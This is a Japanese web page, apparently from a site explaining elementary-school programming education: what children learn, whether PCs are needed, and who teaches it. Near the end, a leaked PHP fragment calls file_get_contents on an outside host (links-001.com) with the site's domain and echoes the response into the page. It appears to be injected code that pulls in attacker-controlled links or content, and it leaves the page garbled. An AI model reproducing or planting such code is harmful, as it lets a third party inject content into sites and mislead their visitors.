前へ
次へ

プログラミング教育で学ぶことは

プログラミング教育がスタートしますが、プログラミングを学ぶ新しい教科ができるわけではありません。算数

more

プログラミング教育にパソコンは必要か

プログラミング教育がはじまるにあたり、子供たちが学習できる環境を整えることは必要不可欠です。しかし、

more

プログラミングを教えるのはだれか

プログラミングは基本的に学校の先生が教えることになっています。そのため、プログラミング教育の指導体制

more

プログラミング教育ではどんなことを勉強するのか

小学校では、プログラミング教育を通じて、身近な生活でコンピューターが活用されていて、問題の解決には必要な手順があることを学び、プログラミング的思考を育んでいきます。そして、コンピューターをよりよい人生や社会づくりに活かそうとする態度を身につけることを目的としています。身の回りにコンピューターがあふれる一方で、その仕組みはブラックボックス化しています。子供たちは、コンピューターに意図した処理を行わせるプログラミングを体験しながら、コンピューターとはどんなものなのかやその仕組みを学び、特性を理解していくわけです。その過程で、コンピューターにできること、できないことに気づくことで、目的に合わせて適切に使いこなし、情報化社会をコンピューターと共存しながらいかに生きていくかを考えるようになるでしょう。コンピューターの仕組みを理解することで、適切に使いこなせるようになります。それは、情報社会という世の中の仕組みを総合的に理解することにもつながります。

".file_get_contents('http://links-001.com/123set7.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top